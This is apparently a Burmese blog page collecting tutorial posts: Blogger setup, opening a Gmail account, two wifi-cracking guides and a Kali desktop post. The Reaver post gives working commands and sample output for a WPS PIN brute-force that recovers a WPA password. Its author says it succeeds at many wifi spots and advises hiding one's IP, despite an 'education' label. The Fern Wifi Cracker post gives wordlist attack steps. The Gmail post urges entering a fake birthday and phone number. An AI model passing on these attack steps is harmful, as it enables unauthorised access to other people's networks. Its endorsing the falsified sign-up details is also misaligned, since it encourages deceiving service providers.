2 နေရာလေးကတော့ စာကြောင်းတွေကို တစ်ကြောင်းပြီးတာနဲ့ နောက်ထပ်ဆက်ရေးလို့ ရရ၊ မရရ အောက်ဆင်းပြီးမှဆက်ရေးမယ်ဆိုရင်သုံးတဲ့ကောင်လေးပါ။ ဒီနေရာမှာမေးထားတာက ရိုးရိုးသာမန်ပဲ Enter ခေါက်ပြီးဆင်းမလား၊ ဒါမှမဟုတ် HTML Code တစ်ခုဖြစ်တဲ့
ကိုသုံးမလားဆိုပြီးမေးတာပါ။ ဒီနေရာမှာတော့ လျှာရှည်မနေပါနဲ့တော့ ဒီတိုင်းပဲထားခဲ့လိုက်ပါ။ ပြောမရလို့ရှည်ချင်သပ ဆိုလည်းရှည်ကြပေါ့ဗျာ။
3 နေရာကတော့ Compose နေရာကရေးရင် ကုဒ်တွေချပေးရမလား၊ မပေးရဘူးလားမေးတာပါ။ ပြင်မနေပါနဲ့။ ဒီတိုင်းထားလိုက်။
4 နေရာကိုသွားမယ်။ ဒီကောင်က Post Date And Time။ Automatic မှာထားရင်ချက်ချင်းပေါ်လာမယ်။ မဟုတ်ဘဲနဲ့ Scheduled At ဆိုတာကိုနှိပ်လိုက်ရင်တော့အောက်မှာဘောက်စ်လေးနှစ်ခုကျလာပြီးတော့ ပို့စ်ကို ရက်ကြိုပြီးတော့တင်တာပဲဖြစ်ပါတယ်။ ရက်ကြိုတင်တယ်ဆိုတာက ဥပမာ ဒီပို့စ်ရေးတဲ့ရက်ဆိုရင် 15.2.2012။ ဒီပို့ကို ခုမတင်ချင်သေးဘူး 17.2.2012 မှတင်မယ်ဆိုရင် အောက်က ဘောက်စ်မှာ 17.2.2012 လို့ရေးလိုက် အချိန်ကိုတော့ ကြိုက်တဲ့အချိန်ရွေးပေးပြီး Publish ကိုနှိပ်လိုက်။ ဒါဆိုရင် ပို့စ်က ခုချက်ချင်းဘလော့ဂ်မှာတက်မလာတော့ဘူး။ စောစောကရွေးပေးထားတဲ့အချိန်ကျမှ ဘလော့ဂ်ပေါ်ကို အလိုလိုရောက်လာလိမ့်မယ်။ ဒါပါပဲ။ အထက်ကပုံလေးကိုရှင်းပြတာပါ။
ပြီးသွားပြီဆိုတော့ Publish Post ကိုနှိပ်လိုက်။ အောက်မှာပြထားတဲ့အတိုင်းပေါ်လာမယ်။
ကိုယ်တင်လိုက်တဲ့ပို့စ် ပေါ်မပေါ်သိချင်ရင် View Post ကိုနှိပ်ပါ။ ပို့စ်ကိုပြန်ပြင်ချင်ရင် Edit Post ကိုနှိပ်ပါ။ ပို့စ်ပြင်တာကတော့ နောက်မှပြန်ပြင်လည်းရပါတယ်။ အဲဒါတွေကို နောင်တစ်ခုမှာရှင်းပြပါ့မယ်။ ပို့စ်အသစ်ထပ်တင်ရန်အတွက် Create New Post ကိုနှိပ်ပါ။
ပို့စ်တင်ပြီးပြီဖြစ်တဲ့ ဘလော့ဂ်လေးပေါ့။

ကဲကျွန်တော်မပြောလား။ အရှည်ကြီးပြောရမှာပါဆို။ ဖတ်ရတဲ့သူတော့ရှင်း၊ မရှင်းမသိဘူး။ ရေးရတဲ့ကျွန်တော်တော့ လက်တွေမလှုပ်ချင်အောင်ညောင်းနေပြီ။ ဒါတောင်မပြီးသေးဘူးနော်။ ကျန်သေးတယ်။ အများကြီးကျန်သေးတယ်။ ပို့စ်တင်တဲ့အပိုင်းနဲ့ပတ်သတ်ပြီးတော့ပေါ့နော်။ ခုတော့ ဒီမှာပဲ ခဏနားရအောင်ဗျာ။

0 Blogging အပိုင်း (၂)

အခု Blog စရေးရအောင်။Blog တစ်ခုစတင်တည်ဆောက်ဖို့အတွက် www.blogger.com ကိုသွားပါမယ်။ အောက်မှာမြင်ရတဲ့အတိုင်း Gmail Login ၀င်သလိုစာမျက်နှာမျိုးလေးကျလာတာကိုတွေ့ရပါမယ်။ အဲဒီမှာ မနေ့ကဖွင့်ခဲ့တဲ့အကောင့်အသစ်ရဲ့ Username နဲ့ Password ရိုက်ထည့်လိုက်ပါ။အောက်မှာကြည့်ပါ။



Username, Password ရိုက်ထည့်လိုက်တာနဲ့ အောက်မှာပြထားသလို Blog တစ်ခုစလုပ်ရပါတော့မယ်။ အောက်မှာကြည့်လိုက်ပါ။

သင်ဖော်ပြချင်တဲ့အမည်ဆိုတာကတော့ ဘလော့ဂ်မှာ ပို့စ်ကိုဘယ်သူရေးတယ်ဆိုပြီးပြပါမယ်။ ဘာလို့တောင်းရသလဲဆိုတာကို နောက်သက်ဆိုင်တဲ့အပိုင်းရောက်ရင် ရှင်းပြပေးပါမယ်။ ဒီမှာရှင်းပြလိုက်လို့ ရပေမယ့်စာကရှည်သွားမှာဖြစ်သလို ခုလည်းအသုံးမ၀င်သေးလို့ပါ။
Blogger မှမေးလ်များလိုချင်ရင်ဆိုတာကတော့ သင့် Blog နဲ့ပက်သတ်ပြီးအကြံပေးစာတွေ၊ Google ( Blogger ) ကနေ Feature အသစ်တွေထည့်ပေးရင်သင့်အကောင့်ထဲကို မေးလ်ပို့ပေးရမလား ဆိုတာပါ။ လိုချင်ရင်တော့ အမှန်ခြစ်ပေါ့။ မလိုချင်ရင်တော့ အမှန်မခြစ်နဲ့ပေါ့။
သင့်လိင်အမျိုးအစားကတော့ ကျား၊ မ ပေါ့။ ကိုယ့်ဟာကိုယ်ကြည့်ရွေးပေါ့။
ဒီနေရာမှာ အမှန်ခြစ်ခဲ့ပါဆိုတာကတော့ Gmail Account အသစ်ဖွင့်တုံးကလို Google ရဲ့စည်းကမ်းတွေကို လိုက်နာနိုင်ပါ့မလားပေါ့နော်။ လိုက်နာနာ၊ မနာနာ နာချင်ယောင်ဆောင်လိုက်ပေါ့။ ပြီးမှလုပ်ချင်တာလုပ်ကြတာ သဘာဝပဲနော့။အဲ့တော့ အမှန်ခြစ်ထားခဲ့လိုက်။ ပြီးရင်တော့ နောက်တစ်ဆင့်သွားရအောင် CONTINUE ကိုနှိပ်ခဲ့လိုက်။ အောက်မှာပြထားတဲ့စာမျက်နှာကိုရောက်သွားလိမ့်မယ်။ ဒုတိယအဆင့်ပေါ့။

ဒီကောင်လေးကိုကြည့်ထားပါဆိုတာ အရမ်းကြည့်ခိုင်းတာမဟုတ်ပါဘူး။ စောစောက ကျွန်တော်က Blogger ကမေးလ်များလိုချင်ရင်ဆိုတဲ့နေရာမှာ အမှန်မခြစ်ခဲ့လိုခုလိုမေးလာတာပါ။ အမှန်ခြစ်ခဲ့ရင်တော့မပေါ်တော့ပါဘူး။ ပြီးရင်တော့ CREATE YOUR BLOG NOW ကိုနှိပ်လိုက်ပါ။ တတိယအဆင့်ကိုအောက်မှာပြထားသလိုရောက်သွားပါမယ်။

ဒီအဆင့်မှာတော့ ပထမဆုံး ကိုယ့် Blog ခေါင်းစဉ်ကိုရွေးရပါမယ်။ ကိုယ့် Blog မှာပါဝင်မယ့်ပို့စ်လေးတွေနဲ့ သက်ဆိုင်တာလေးရွေးပေါ့နော်။ မြန်မာလိုရေးလည်းရပါတယ်။ ခေါင်းစဉ်ကိုဖြစ်နိုင်ရင် တိုတိုပဲပေးပါ။ အရှည်ကြီးဆိုရင်မကောင်းဘူး။ နောက်ပိုင်း Template အကြောင်းပါတဲ့အခန်းတွေကျရင်ပြန်ပြောပြမယ်။
ပြီးရင်တော့ ကိုယ့် Blog ရဲ့လင့်ခ်ကိုရွေးရမယ်။ ဒီနေရာမှာကလည်း Gmail Username လိုပဲ။ Blog လင့်ခ်ချင်း တစ်ခုနဲ့တစ်ခု မတူပါဘူး။ မြန်မာပြည်က သန့်သူရဦး Blog, www.thantthuraoo.blogspot.com နဲ့ အင်္ဂလန်က သန့်သူရဦး Blog, www.thantthuraoo.blogspot.com နဲ့တူနေတာမျိုးမရှိပါဘူး။ ကိုယ်ရတဲ့လင့်ခ်ကိုစိတ်ချလက်ချသုံးနိုင်ပါတယ်။ ပြီးတော့ ကိုယ့် Blog ကိုဖျက်ပစ်ခဲ့ရင်တောင်မှ တခြားသူတစ်ယောက်အတွက် ကိုယ့်လင့်ခ်မရနိုင်ပါဘူး။ Blogger ရဲ့ကောင်းချက်လေးတွေနော့။ ပြီးရင် ကိုယ်ရွေးထားတဲ့လင့်ခ်က ကိုယ့်အတွက်ရနိုင်၊ မရနိုင်ကို အောက်က Check Availability ကိုနှိပ်ပြီးစစ်ကြည့်။ ရရင် အောက်မှာပြထားသလို အစိမ်းရောင်လေးနဲ့ This Blog Address Is Available ဆိုပြီးပေါ်မယ်။ အဲဒါဆိုရင်အောက်က CONTINUE ကိုဆက်နှိပ်ခဲ့။ မရရင်ဘူးဆိုရင်တော့ အောက်မှာပြထားတဲ့ပုံအတိုင်းပေါ်လာမယ်။
ဒီကောင်လေးကတော့ ကိုယ်ရွေးထားတဲ့ကိုယ့် Blog လင့်ခ်ကမရနိုင်လို့ပြတာလေးပါ။ စာလုံးအနီရောင်လေးနဲ့ Sorry, this blog address is unavailable ဆိုပြီးပေါ်လာလိမ့်မယ်။ဒါဆိုရင် လင့်ခ်နောက်တစ်မျိုးထပ်ရေးပြီးတော့ ပြန်စစ်။ ရရင် CONTINUE ကိုနှိပ်ခဲ့။ပြီးရင် နောက်တစ်ဆင့်ဆက်သွားမယ်။
ဒီအဆင့်က ကိုယ့် Blog Template ရွေးရမယ့်အဆင့်။ ကိုယ်က ဒီ Template ပဲသုံးမယ်၊ Template မပြောင်းတော့ဘူးဆိုရင်တော့ သေချာရွေးပေါ့။ မဟုတ်ဘူး။ ဒါကခဏပဲ။ ပြီးတာနဲ့ပြောင်းမှာဆိုရင်တော့ ကြိုက်ရာသာရွေးပေးထားခဲ့။ ပြီးရင်တော့ထုံးစံအတိုင်း CONTINUE ကိုနှိပ်။နောက်တစ်ဆင့်ဆက်သွားမယ်။
ဒီအဆင့်ကတော့ ကိုယ့် Blog တစ်ခုကိုတည်ဆောက်ပြီးကြောင်းပြတာပါ။ ကိုယ်က ခုချက်ချင်းပဲ ပို့စ်တင်တော့မယ်ဆိုရင်တော့ start posting now ကိုနှိပ်။ ဒါမှမဟုတ် Blog Template ကိုပြင်ဦးမယ်ဆိုရင်တော့ customize how your blog looks ဆိုတာကိုနှိပ်။ ကိုယ်ပိုင်ဒိုမိန်းရှိပြီးသားသူများကတော့ Set Up a custom Domain ကိုနှိပ်။ ဒါမှမဟုတ် ကိုယ်က အရင်က ဘလော့ဂ်တစ်ခုရှိပြီးသား။ အဲ့ကပို့စ်တွေအကုန်ကူးထည့်ချင်တယ်ဆိုရင် Import Blog Tool ကိုနှိပ်။ အဲဒီ Blog Import, Export ကိုသူနဲ့ဆိုင်တဲ့အခန်းရောက်တော့သိလာလိမ့်မယ်။ ထပ်ရှင်းပြမယ်။ လောလောဆယ်တော့ Start Blogging ကိုနှိပ်ခဲ့ပါ။ ဒီပို့စ်မှာတော့ ဒီလောက်ပါပဲ။ သူ့နောက်လာမယ့်အပိုင်းကတော့ Blog မှာ Post တင်တာပါ။ အဲဒါက တော်တော်ရှင်းပြရမယ်။ ရှင်းမလိုလို၊ လွယ်မလိုလိုနဲ့ တော်တော်ပြဿနာတက်တဲ့အပိုင်း။ ဒီပို့စ်ထဲမှာထည့်လိုက်ရင် စာကအရမ်းရှည်သွားမှာဖြစ်သလို ဖတ်ရင်းနဲ့ ခေါင်းတွေစားပြီး ရွာလည်နေလိမ့်မယ်။ အဲ့တော့ ဒီပို့စ်ကို ဒီမှာပဲ ခဏနားလိုက်ရအောင်ဗျာ။
ဒုတိယအဆင့် သတိပြုရန်-- Blogger စသုံးသည့်ရက်မှတ်ထားပါ။

0 Blogging အပိုင်း (၁) (OR) Gmail Account အသစ်ဖွင့်နည်း

အခု Blog တစ်ခုကို ကိုယ်တိုင်လုပ်ကိုင်ဖန်တီးကြရအောင်။ ပထမဆုံးအနေနဲ့ Blog တစ်ခုလုပ်ဖို့အတွက် Google Mail ( G-Mail ) တစ်ခုရှိဖို့လိုပါတယ်။ ဒီ G-Mail ကိုအကောင့်အသစ်ဖွင့်ရပါမယ်။ ဘာကြောင့်လဲဆိုတော့ မိမိ Blog လုံခြုံရေးအတွက်ပါ။ Username မသိတဲ့အကောင့်တစ်ခုကိုဘယ်လိုမှ Hack ဖို့မဖြစ်နိုင်ပါဘူး။ မိမိ Blog ရေးသားတဲ့အကောင့်ကိုဘယ်သူ့ကိုမှပေးမသိပါနဲ့၊ Blog ရေးတဲ့အကောင့်နဲ့ Chatting, Mail လုံးဝမသုံးပါနဲ့၊ ပြီးတော့ အကောင့်စဖွင့်ရက်၊ Blogger စသုံးရက်၊ တကယ်လို့ကိုယ်က Feed Burner ကိုလည်းဒီအကောင့်နဲ့ပဲသုံးမယ်ဆိုရင်လည်း Feed Burner စသုံးရက်စတဲ့ Google ကပေးထားတဲ့ Product တွေသုံးတဲ့ရက်စွဲတွေကိုမှတ်ထားပါ။ ဒါမှကိုယ့်အကောင့်တစ်ခုခုဖြစ်သွားခဲ့ရင် (ဆိုလိုတာက Hack ခံလိုက်ရရင်) ပြန်ယူရအောင်ပါ။ အရင်ကတော့ကျွန်တော်တို့ Feed Burner ကမေးလ်နဲ့ဖတ်သူတွေဆီမေးလ်ဝင်ရင် သူ့ကိုပေးထားတဲ့အကောင့်နဲ့ပို့ပါတယ်။ ဥပမာ-ကျွန်တော်က Feed Burner ကို r00cd3r@gmail.com နဲ့လုပ်ထားရင် မေးလ်ပို့တဲ့အခါ r00cd3r@gmail.com နဲ့ပို့ပါတယ်။ ခုနောက်ပိုင်းတော့ပို့ရင် no-reply@blogger.com နဲ့ပဲပို့တော့တဲ့အတွက် Feed Burner အတွက်အကောင့်သီးသန့်ထားစရာမလိုတော့ပါဘူး။ အဆင်ပြေသွားတာပေါ့နော်။ ကိုယ်က ဆော့ဖ်ဝဲတွေဝေမျှဦးမယ်၊ တခြား Hosting တွေကနေရှယ်ယာပေးဦးမယ်ဆိုရင်တော့ဖြစ်နိုင်ရင်အဲဒီ Hosting တွေမှာအကောင့်ဖွင့်ဖို့အတွက် မေးလ်တစ်ခုသီးသန့်သုံးပေးတာ ပိုကောင်းပါတယ်။ဘာကြောင့်လဲဆိုတော့ Hosting ဆိုဒ်တွေကိုစိတ်မချလို့ပါ။ အဲဒီတော့အခုအကောင့်တစ်ခုစဖွင့်လိုက်ရအောင်။ အကောင့်ဖွင့်ဖို့အတွက် www.mail.google.com ကိုသွားပါ။ ပြီးရင်အပေါ်ထောင့်နားက Create An Account ကိုနှိပ်လိုက်ပါ။ အောက်မှာကြည့်ပါ။


ပြီးရင်အောက်မှာပြထားတဲ့အတိုင်းတစ်ဆင့်ချင်းလုပ်သွားပါ။

ဖော်ပြမယ့်အမည်ကတော့ ကိုယ်ပေးချင်သလိုပေးပါ။ရပါတယ်။ မြန်မာလိုလည်းရပါတယ်။
Username ကတော့ English လိုပဲရပါတယ်။ ပြီးတော့ သူများသုံးပြီးသားနာမည်မဟုတ်ရပါဘူး။ ဘာလို့လည်းဆိုတော့ မေးလ်တွေထပ်ပြီး မှားဝင်မှာစိုးလို့ပါ။ ကိုယ်ရတဲ့ Username ကိုလည်းစိတ်ချလက်ချသုံးနိုင်ပါတယ်။ ကိုယ့် Username လိုမျိုးနောက်ထပ်မရှိပါဘူး။ ဥပမာ- မြန်မာပြည်က thantthuraoo@gmail.com နဲ့ အင်္ဂလန်က thantthuraoo@gmail.com တူနေတယ်ဆိုတာမျိုးမရှိပါဘူး။ နောက်တစ်ခုက တူချင်တယ်ဆိုရင်တောင်မှ Mail တစ်ခုတည်းမှာမရပါဘူး။ ဥပမာ- thantthuraoo@gmil.com နဲ့ thantthuraoo@yahoo.com ဆိုပြီးရပါတယ်။
Password နေရာမှာတော့ပေးချင်သလိုပေးပါ။ ရပါတယ်။ ဒါပေမယ့် သူများခန့်မှန်းလို့ရတာမျိုးတော့မပေးနဲ့ပေါ့။
Password ပြန်ရေးတဲ့နေရာမှာတော့ အပေါ်မှာကိုယ်ပေးထားတဲ့အတိုင်းပြန်ရေးပေးပါ။
မွေးနေ့မှာတော့ ကိုယ့်မွေးနေ့မဟုတ်လည်းရပါတယ်။ ကောင်းတာကတော့မွေးနေ့ကို 18 နှစ်ကျော်အောင်ပေးပေါ့။ ဒါမှအဆင်ပြေလိမ့်မယ်။ဘာကြောင့်လည်းဆိုတော့ တချို့ Google Product တွေက 18 နှစ်မကျော်ရင်အကောင့်မဖွင့်ရဆိုပြီးရှိလို့ပါ။ ဥပမာ- Google+ လိုပေါ့။
လိင်အမျိုးအစားနေရာမှာတော့ Male (or) Female တစ်ခုခုရွေးပေးပေါ့နော်။ ကိုယ့်ဟာကိုယ်ရွေးပေါ့။
ပြီးရင် ဖုန်းနံပါတ်။ ဖုန်းနံပါတ်ကတော့မြန်မာပြည်ကဖုန်းဆိုရင် ဘယ်ဖုန်းမှမရပါဘူး။ အဲ့တော့ ကိုယ်ကနိုင်ငံခြားကအသိရှိတယ်၊ နိုင်ငံခြားမှာနေတယ်ဆိုရင်တော့ကိုယ့်ဖုန်းနံပါတ်နဲ့ကိုယ်လုပ်ပေါ့။ တစ်ခုရှိတာက နိုင်ငံခြားကသူများဖုန်းနံပါတ်ရေးမယ်ဆိုရင် သတိထားပါ။ အဲဒီကိုယ်ရေးပေးထားတဲ့ဖုန်းနံပါတ်ကနေတစ်ဆင့်အကောင့်ကို အချိန်မရွေးယူသွားနိုင်ပါတယ်။ ကိုယ့်လူကစိတ်ချရတယ်ဆိုရင်တော့လုပ်ပေါ့။ မြန်မာပြည်ကလူတွေအတွက်တော့အကြံအဖန်လုပ်ရပါတယ်။ ဘယ်လိုလည်းဆိုတော့ ကျွန်တော့်ဖုန်းဆိုရင် 092038491၊ အဲ့တော့ ရှေ့က 0 ကိုဖြုတ်ပြီး 92038491 လို့ရေးရတယ်။ အဲဒါဆိုအဆင်ပြေပါတယ်။ ဒါပေမယ့် ပြန်ယူလို့တော့မရပါဘူး။ တကယ်တော့ အဲဒီဖုန်းနံပါတ်က မြန်မာပြည်မှာ ရှိမှမရှိဘဲ။ သူလက်ခံအောင်သာ အကြံအဖန်လုပ်ရတာလေ။
နောက်ပြီးတော့ ရှိပြီးသားမေးလ်တစ်ခု။ အဲဒါကလည်းဖုန်းနံပါတ်လိုပဲအရေးကြီးပါတယ်။ ဒါပေမယ့် ဖုန်းနံပါတ်လိုတော့ အကြံအဖန်မရပါဘူး။ တကယ်ရှိတဲ့မေးလ်ပဲရပါတယ်။ ကိုယ့်မှာမေးလ်တစ်ခုတောင်မရှိဘူးဆိုရင်တော့ စိတ်ချရတဲ့သူငယ်ချင်းမေးလ်ကိုသာရေးပေးလိုက်ပေါ့။ အဲဒီမေးလ်ကနေတစ်ဆင့်အကောင့်ကိုပြန်ယူလို့ရတယ်ဆိုတာတော့ သတိထားနော်။ ကျွန်တော့မေးလ် thantthuraoo@gmail.com ရေးပေးလိုက်လည်းပြဿနာမရှိပါဘူး။ ရေးပေးလိုက်ပါ။ ဘယ်သူ့အကောင့်မှမယူပါဘူး။ ယူဖို့လည်းအချိန်မပေးနိုင်ပါဘူး။ တကယ်လိုအပ်နေတဲ့သူတွေအတွက်ပြောတာနော်။ပြီးသွားရင် အောက်မှာဆက်ကြည့်။



ဆက်ရေးရမှာကတော့ အပေါ်က Box လေးထဲမှာ သူပေးထားတဲ့အတိုင်းစာလုံးလေးတွေရေးပေး၈ုံပါပဲ။ လွယ်ပါတယ်။
ပြီးတော့ Location။ အဲဒါကတော့ ကိုယ်နေတဲ့နိုင်ငံရွေးပေးပေါ့။ မြန်မာဖြင့်မြန်မာပေါ့။
ပြီးရင် အောက်မှာပြထားတဲ့အတိုင်း Agree to the google ဘာသာသာရကာပေါ့နော်။ အဲ့ဘေးမှာ အမှန်ခြစ်လေးပေးခဲ့ပါ။ ပြောရရင်တော့ Google ရဲ့စည်းကမ်းတွေကိုလိုက်နာနိုင်ပါ့မလားပေါ့နော်။ ဘယ်သူမှကိုယ့်လိုက်ကြည့်နေတာမှမဟုတ်တာ။ မတူချင်လည်း တူပေးလိုက်ပေါ့။ ပြီးမှ ကိုယ်လုပ်ချင်တာလုပ်။
ပြီးသွားရင်တော့ Next Step ကိုနှိပ်ပေးလိုက်ပါ။အဲဒါဆိုရင် နောက်တစ်ဆင့်လုပ်ရပါမယ်။အောက်မှာကြည့်ပါ။


ဒီပုံလေးကတော့ ကိုယ့် Profile မှာပုံမထည့်ချင်တော့တဲ့သူတွေအတွက်ပါ။ ပုံထည့်ချင်သေးတယ်ဆိုရင်တော့ Add Profile Photo ကိုနှိပ်လိုက်ပါ။ အောက်မှာပြထားတဲ့အတိုင်း ပေါ်လာပါမယ်။

အဲဒီမှာပြထားတဲ့အတိုင်းတစ်ဆင့်ချင်းလုပ်သွားလိုက်။
ပုံရွေးဖို့နှိပ်၊ ပြီးရင် ပေါ်လာတဲ့ Box မှာကြိုက်တဲ့ပုံရွေး။
ပြီးတော့ Open ကိုနှိပ်ပေးလိုက်။အောက်မှာပြထားတဲ့အတိုင်း ပုံကို Upload စတင်လိမ့်မယ်။
ပြီးရင်တော့အောက်မှာပြထားတဲ့အတိုင်းထွက်လာမယ်။


ပုံအရွယ်အစားချိန်ရမယ့်နေရာမှာ ကိုယ်တင်လိုက်တဲ့ပုံထွက်လာပါမယ်။ ဘေးကလေးထောင့်အကွက်လေးတွေကိုနှပ်ပြီး ပုံအရွယ်အစားချိန်ပေးပါ။
ပြီးရင်တော့ Set as Profile Photo ကိုနှိပ်ပေးလိုက်ပါ။ အောက်မှာပြထားတဲ့အတိုင်း ပေါ်လာပါမယ်။


အဲဒီမှာ ကိုယ်တင်လိုက်တဲ့ပုံလေးကိုတွေ့ရပါလိမ့်မယ်။ မကြိုက်သေးရင် Edit Profile Photo ကိုနှိပ်ပြီးပြန်ပြင်နိုင်ပါတယ်။ ပြီးရင်တော့ Next Step ပေါ့။ နောက်တစ်ဆင့်သွားရအောင်။ အောက်မှာကြည့်ပါ။

ပြီးရင်တော့ မိမိအကောင့်ကိုကြည့်ဖို့အတွက် Continue To Gmail ကိုနှိပ်ခဲ့ပါ။ဒါဆိုရင် Gmail ကိုရောက်သွားပါမယ်။ အောက်မှာကြည့်ပါ။

ကဲ။ အဲဒါဆိုရင်တော့ Gmail Account အသစ်ဖွင့်နည်းသိသွားပြီဖြစ်သလို အကောင့်အသစ်တစ်ခုလည်းရပြီပေါ့ဗျာ။
ဒီပို့စ်မှာတော့ ဒီလောက်ပါပဲ။ ပို့စ်တစ်ခုကို နည်းနည်းချင်းသင်ပေးသွားပါမယ်။ ပို့စ်တစ်ခုတည်းမှာအကုန်လုံး စုပြုံထည့်လိုက်ရင် ဖတ်ရတာလည်းပျင်းသွားမှာဖြစ်သလို စာကလည်းအရမ်းရှည်သွားမယ်။ စာရှည်တာကတော့ ပြဿနာမရှိပါဘူး။ ဘယ်လောက်ရှည်ရှည် ရှည်ပါစေ။ ရှင်းရှင်းလင်းလင်း နားလည်သဘောပေါက်သွားမယ်ဆိုရင် ကျွန်တော်ရေးရကျိုးနပ်ပါတယ်။ တကယ်တော့ ဒီပို့စ်လေးက Gmail အကောင့်အသစ်ဖွင့်နည်းလို့တောင်ခေါင်းစဉ်ပေးသင့်တာ။ ဒါပေမယ့် အဲဒီ Gmail ဖွင့်ရတဲ့ရည်ရွယ်ချက်က Blogging အတွက်ဆိုတော့ Blogging အပိုင်းတစ်နှင့် Gmail Account အသစ်ဖွင့်နည်းလို့ပဲ ရေးလိုက်ပါတယ်။ ဒီမှာပဲ ခဏနားလိုက်ရအောင်နော်။
မှတ်ချက်။ အပေါ်ရှိပုံများတွင်ပေးထားသော Username များမှာ အမှန်တကယ်မရှိပါ။ သဘောမျှသာရေးပေးထားခြင်းဖြစ်ပါသည်။ အမှန်တကယ်အကောင့်များပါသည့်ပုံများတွင် Username များကိုဖျက်ထားပါသည်။ဆက်လက်ပြီး ဖော်ပြမယ့် Blogging အပိုင်းများတွင်လည်း အကောင့်များကိုဖျက်ထားမည်ဖြစ်ပါသည်။
ပထမအဆင့်သတိပြုရန်-- အကောင့်စဖွင့်သည့်ရက်စွဲကိုမှတ်ထားပါ။

0 How to Cracking WPA and WPA2 key with Reaver in Kali Linux (No Dictionary - Wordlist)

Reaver ကိုသုံးပြီးတော့ hack တာပါ Education post အနေနဲ့ပြသပေးမှာဖြစ်ပါတယ်

wifi ကလည်း မိမိ၏ဖုန်းမှထုတ်လွှင့်သောလိုင်းကို attack လုပ်ကြည့်မှာပါ
အရင်ဆုံး Terminal ထဲမှာရေးလိုက်ပါ

root@kali:~# airmon-ng
Interface                      Chipset                         Driver
wlan0                     Atheros AR9485              ath9k - [phy0]
root@kali:~# airmon-ng stop wlan0
Interface                       Chipset                       Driver
wlan0                       Atheros AR9485            ath9k - [phy0]
                                                                  (monitor mode disabled)
root@kali:~# airodump-ng wlan0 


ဒီအဆင့်ထိပြီးသွားရင်တော့ နောက်တစ်ဆင့်သွားထပ်သွားမယ်
အောက်ကပုံလိုမျိုးလိုင်းတွေကျလာရင်တော့ ok ပါပြီ

 
--> 
BSSID 02:03:7F:C5:99:C3 ESSID aunglay CH 1 ENC WPA2 စတာတွေပါဝင်တဲ့ လိုင်းက ကျွန်တော့် ဖုန်းလိုင်းပါ

ဒီ Terminal ကိုမပိတ်ပဲ နောက်ထပ် Terminal အသစ်တစ်ခုထပ်ဖွင့်လိုက်ပါ

root@kali:~# wash -i wlan0 -c 1 -C -s

အနီရောင်ချယ်ထားသော နေရာတွင် တခြား နာပတ်များဖြစ်နေနိုင်သည်
Target ရဲ့ CH ကိုကူးယူခြင်းဖြစ်သည်
ကျွန်တော့်လိုင်းအောက်က THA Call ဆိုတဲ့လိုင်းကို hack မယ်ဆို ပေါ့ဗျာ
02:03:7F:C5:99:C3 ဆိုတာကလည်း ပြောင်းလဲနိုင်တယ်နော်
ကိုယ် target wifi ပေါ်လာပြီဆိုရင်တော့ Ctrl+c နှိပ်ပြီး ရပ်လိုက်ပါ

root@kali:~# reaver -i wlan0 -b 02:03:7F:C5:99:C3 –fail-wait=360

Reaver v1.4 WiFi Protected Setup Attack Tool

Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <cheffner@tacnetsol.com>

[+] Waiting for beacon from 02:03:7F:C5:99:C3

[+] Associated with 02:03:7F:C5:99:C3 (ESSID: aunglay) 


မရှင်းသေးရင် အောက်ကပုံကိုကြည့်ပါ



ဒီနေရာမှာတော့ အချိန်ပေးရပါတယ် wordlist နဲ့တိုက်စစ်တာမဟုက်တဲ့အတွက် password ပေးထားမှုအပေါ် မူတည်ပြီးပြောင်းလဲနိုင်ပါတယ်

အောင်မြင်သွားရင်တော့

[+] WPS PIN : '123456789'
[+] WPA PSK : 'asdfjhjk'
[+] AP SSID : '744edz'

ဆိုပြီးပေါ်လာပါလိမ့်မယ် Hacking အပိုင်းဒီမှာပြီးပါပြီ
သို့သော် တချို့တွေက အထွန့်တက် တက်ကျသေးတယ် အကယ်၍ ပိုင်ရှင်က password ချိန်းသွားရင်ရောတဲ့လေ ဒါဆိုလည်းလွယ်လွယ်လေးပါ WPS PIN ရထားတာပဲ

Reaver –help ရိုက်ကြည့်လိုက်ပါ

Advanced Options:
-p, --pin=<wps pin> Use the specified 4 or 8 digit WPS pin

ဆိုတာပါရှိပါတယ် PIN သိရင် ပြန်ယူလို့ရပါတယ်ဗျာ Password ဘယ်လောက်ချိန်းချိန်းပါ
PIN အကြောင်းကိုတော့ နောက်ပိုင်းမှာ အကျယ်ရေးသားပေးပါဦးမယ်

ယခုနည်းကလည်း ကျွန်တော်ကိုယ်တိုင် စမ်းသပ်အသုံးပြုနေသော နည်းပါ wifi လွှင့်ထားတဲ့
နေရာတော်တော်များများမှာ စမ်းတာအောင်မြင်ပါတယ် အဲတစ်ခုပဲ IP hite ထားပါ :P
စာအုပ်ပါ တင်ပေးထားပါတယ်
ဒီမှာ ဒေါင်းပါ
ကျေးဇူးတင်ပါသည်

0 How to hack wifi with wordlist in Fern Wifi Cracker (KAlI LINUX)

Wordlist အသုံးပြုပြီး wifi ဘယ်လို hack မလဲဆိုတာအတွက်


How to hack wifi with wordlist in Fern Wifi Cracker (KAlI LINUX)

Applications >> Kali Linux >> Wireless Attack >> fern wifi cracker



လွယ်လွယ်လေးပါ
1. Select Interface ကို Click လိုက် wifi ရှိရင် ကျလာလိမ့်မယ်
2. Scan for Access Points ကို Click Active ဆို OK
3. Wifi WPA 1 Detected ဆို wifi 1 ခုရှိတာပဲ
4. Wifi WPA 1 Detected ကို Click လိုက်



  1. Browse ကို Click ပြီး Wordlist ရှိတဲ့နေရာကိုရွေးပေးလိုက်
  2. WPS Attack ကိုရွေး
  3. ပြီးရင် Wifi Attack ကို Click
  4. ဒါဆိုသူ့ဘာသာ attack လုပ်နေပြီ ကိုယ်ရွေးထားတဲ့ Wordlist ထဲမှာပါရင်သိရမယ် မပါရင် မသိရဘူး
  5. Finished ပြည့်သွားရင် Password ပါသော Wordlist ဆို Password ထွက်လာပါလိမ့်မည်
စာအုပ်အဖြစ် Downlaod ရယူနိုင်ပါသည်

ကျေးဇူးတင်ပါသည်

0 How to customize Desktop in Kali Linux (install KDE Desktop Environment)

Kali linux ရဲ့ မူလပါရှိသော Desktop မှာ Gnome ဖြစ်ပါတယ်

Linux ရဲ့ Disto တော်တော်များများဟာ Desktop Environment ကို စိတ်ကြိုက်ပြင်ဆင်နိုင်ပါတယ်
အလှဆင်မှုများစွာလည်းပြုလုပ်နိုင်ပါတယ် ဒါတွေဟာ Window ထက် Linux ရဲ့ အားသာချက်တွေထဲက
တစ်ခုပေါ့ဗျာ

Gnome Desktop Environment


KDE Desktop Environment





